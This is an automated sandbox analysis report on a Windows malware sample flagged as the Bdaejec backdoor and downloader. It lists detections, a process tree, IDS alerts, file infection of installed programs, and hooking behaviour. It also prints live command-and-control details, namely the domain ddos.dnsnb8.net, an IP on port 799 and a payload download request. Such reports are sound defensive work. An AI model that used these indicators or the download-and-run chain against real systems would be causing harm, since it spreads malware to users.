Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
Analysis ID:	1509229
MD5:	6824b9059b9c6f285f3c6caf2ee19ecc
SHA1:	81e01ba0fe5279ad470cecbb287cb20aec28a13b
SHA256:	89926d7f0153f7258e706acad4ddfe3106bf4ee11fa711170b2133971022b56f
Tags:	exe
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Detected VMProtect packer

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

PE file has a writeable .text section

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe" MD5: 6824B9059B9C6F285F3C6CAF2EE19ECC)

mXfByV.exe (PID: 5008 cmdline: C:\Users\user\AppData\Local\Temp\mXfByV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: mXfByV.exe PID: 5008	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-11T10:32:00.466633+0200	2807908	1	Malware Command and Control Activity Detected	192.168.2.6	49710	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-11T10:31:59.975702+0200	2838522	1	Malware Command and Control Activity Detected	192.168.2.6	64889	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn2	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarD	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar2p	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 11%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarD	Virustotal: Detection: 8%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rar2p	Virustotal: Detection: 11%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Virustotal: Detection: 95%			Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	ReversingLabs: Detection: 55%
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_006429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_006429E2

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_00642B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00642B8C

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.6:64889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.6:49710 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49710 -> 799

Source: global traffic

TCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_00641099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00641099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: mXfByV.exe, 00000002.00000003.2139694761.0000000001250000.00000004.00001000.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: mXfByV.exe, 00000002.00000002.2214008040.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: mXfByV.exe, 00000002.00000002.2214279858.0000000002DEA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar2p
Source: mXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
Source: mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn2
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	String found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: mXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2214008040.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comrobat
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_bb1dc225-0

System Summary

Detected VMProtect packer

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static PE information: .vmp0 and .vmp1 section names

PE file contains section with special chars

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Static PE information: section name: +!i~u
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: mXfByV.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_00646076		2_2_00646076
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_00646D00		2_2_00646D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\mXfByV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: mXfByV.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: mXfByV.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: mXfByV.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/1

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_0064119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_0064119F

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5008

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

File created: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	ReversingLabs: Detection: 55%
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Process created: C:\Users\user\AppData\Local\Temp\mXfByV.exe C:\Users\user\AppData\Local\Temp\mXfByV.exe
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Process created: C:\Users\user\AppData\Local\Temp\mXfByV.exe C:\Users\user\AppData\Local\Temp\mXfByV.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: ddraw.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: dsound.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static file information: File size 3678720 > 1048576

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Static PE information: Raw size of .vmp2 is bigger than: 0x100000 < 0x380a00

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Unpacked PE file: 2.2.mXfByV.exe.640000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp2

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Static PE information: section name: .vmp0
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Static PE information: section name: +!i~u
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Static PE information: section name: .vmp1
Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Static PE information: section name: .vmp2
Source: mXfByV.exe.0.dr	Static PE information: section name: .aspack
Source: mXfByV.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_00641638 push dword ptr [00643084h]; ret	2_2_0064170E
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_0064600A push ebp; ret	2_2_0064600D
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_00646014 push 006414E1h; ret	2_2_00646425
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Code function: 2_2_00642D9B push ecx; ret	2_2_00642DAB

Source: mXfByV.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.9337247832427265
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.9335218015971005
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.934646157098818

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	File created: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 29B0005 value: E9 2B BA 99 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 7734BA30 value: E9 DA 45 66 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 29C0008 value: E9 8B 8E 9D 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77398E90 value: E9 80 71 62 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2AE0005 value: E9 8B 4D E5 73	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 76934D90 value: E9 7A B2 1A 8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B00005 value: E9 EB EB E4 73	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 7694EBF0 value: E9 1A 14 1B 8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B10005 value: E9 8B 8A E1 72	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 75928A90 value: E9 7A 75 1E 8D	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B20005 value: E9 2B 02 E3 72	Jump to behavior
